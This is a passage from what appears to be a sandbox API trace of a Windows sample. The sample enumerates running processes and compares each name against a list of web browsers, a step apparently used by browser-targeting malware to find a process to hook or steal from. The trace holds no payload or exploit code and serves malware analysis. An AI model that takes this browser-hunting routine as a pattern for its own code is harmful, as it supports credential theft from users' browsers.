szExeFile="lsass.exe")) returned 1 [0258.094] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0258.094] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0258.094] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0258.094] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0258.094] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.094] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0258.094] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0258.094] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0258.094] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0258.094] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0258.094] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.094] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.095] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.095] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.095] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.096] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.096] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.096] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.096] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.096] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.096] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.096] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.097] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.097] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.097] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0258.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0258.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0258.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0258.098] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.098] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.098] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.098] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.098] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.098] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.098] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.098] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.099] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.099] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.099] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.099] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.099] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.099] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.099] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0258.099] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0258.099] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0258.100] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0258.100] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.100] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0258.100] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0258.100] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0258.100] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0258.100] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0258.100] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.100] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0258.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0258.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0258.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0258.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0258.101] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.101] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.101] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.101] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.101] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.101] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0258.101] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.101] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0258.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0258.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0258.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0258.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0258.102] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.102] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0258.102] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0258.102] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0258.102] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0258.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0258.103] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.103] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0258.103] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0258.103] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0258.103] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0258.103] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0258.103] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.103] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0258.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0258.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0258.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0258.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0258.104] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.104] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0258.104] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0258.104] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0258.104] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0258.104] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0258.104] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.104] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0258.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0258.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0258.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0258.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0258.105] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.105] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0258.105] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0258.105] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0258.106] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0258.106] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0258.106] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.106] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0258.106] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0258.106] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0258.106] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0258.106] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0258.106] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.106] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0258.107] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0258.107] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0258.107] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0258.107] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0258.107] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.107] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0258.107] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0258.107] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0258.107] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0258.107] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0258.107] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.107] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0258.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0258.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0258.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0258.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0258.108] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.108] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0258.108] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0258.108] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0258.108] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0258.108] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0258.108] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.108] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0258.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0258.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0258.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0258.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0258.109] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.109] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0258.110] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0258.110] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0258.110] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0258.110] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0258.110] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.110] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0258.110] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0258.110] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0258.110] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0258.110] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0258.110] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0258.111] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0258.111] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0258.111] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0258.111] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0258.111] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.111] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0258.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0258.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0258.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0258.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0258.112] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.112] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0258.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0258.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0258.112] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0258.113] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0258.113] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.113] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0258.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0258.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0258.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0258.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0258.113] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.113] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0258.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0258.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0258.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0258.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0258.114] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0258.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0258.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0258.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0258.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0258.114] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.114] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0258.115] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0258.115] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0258.115] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0258.115] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0258.115] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.115] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0258.115] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0258.116] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0258.116] lstrcmpiA 